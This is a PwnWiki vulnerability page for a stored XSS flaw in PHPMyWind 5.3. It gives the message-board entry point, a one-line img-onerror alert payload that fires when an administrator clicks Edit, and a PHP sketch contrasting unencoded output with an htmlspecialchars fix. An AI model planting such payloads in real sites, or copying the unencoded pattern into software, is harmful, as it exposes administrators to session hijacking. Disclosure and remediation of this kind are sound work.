PHPMyWind 5.3 stored XSS vulnerability

From PwnWiki
Revision as of 13:03, 14 April 2021 by Pwnwiki

Payload

Message board

http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php


"><img/src=x onerror=alert(2001)><"'

Admin backend

127.0.0.1/PHPMyWind_5.3/admin/message.php

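The XSS fires only when the administrator clicks Edit. If the administrator wants a message displayed on the front end (or wants to reply to it), they must click Edit.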
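
The fix for this class of bug is output encoding at the point where the stored message is written back into the admin edit form. The sketch below is an added example, not PHPMyWind's own code: the function names, field names and form markup are assumptions, and the sample input is constructed from the payload shown on this page.

```php
<?php
// Added example, not PHPMyWind's code. Function names, field names and
// markup are hypothetical; only the sample input comes from the page.

// Constructed sample: a stored message body modeled on the page's payload.
$stored = '"><img/src=x onerror=alert(2001)><"\'';

// Vulnerable pattern: the stored value is concatenated into an attribute
// and a textarea without encoding, so a quote or tag in it ends the context.
function render_edit_form_unsafe(string $content): string
{
    return '<input type="text" name="content" value="' . $content . '">'
         . '<textarea name="recont">' . $content . '</textarea>';
}

// Encode the five HTML-significant characters, including both quote styles,
// so the value stays data in attribute and element-text contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: same markup, every stored value passes through h().
function render_edit_form_safe(string $content): string
{
    return '<input type="text" name="content" value="' . h($content) . '">'
         . '<textarea name="recont">' . h($content) . '</textarea>';
}

// Simple check used for the demonstration: did a raw <img tag survive
// into the rendered markup?
function contains_raw_img(string $html): bool
{
    return stripos($html, '<img') !== false;
}

$unsafe = render_edit_form_unsafe($stored);
$safe   = render_edit_form_safe($stored);

echo "unsafe markup: $unsafe\n";
echo "raw <img> present: " . var_export(contains_raw_img($unsafe), true) . "\n\n";
echo "safe markup:   $safe\n";
echo "raw <img> present: " . var_export(contains_raw_img($safe), true) . "\n";
```

The same encoding has to be applied wherever the message is rendered on the front end, since the note above says edited messages are displayed there too.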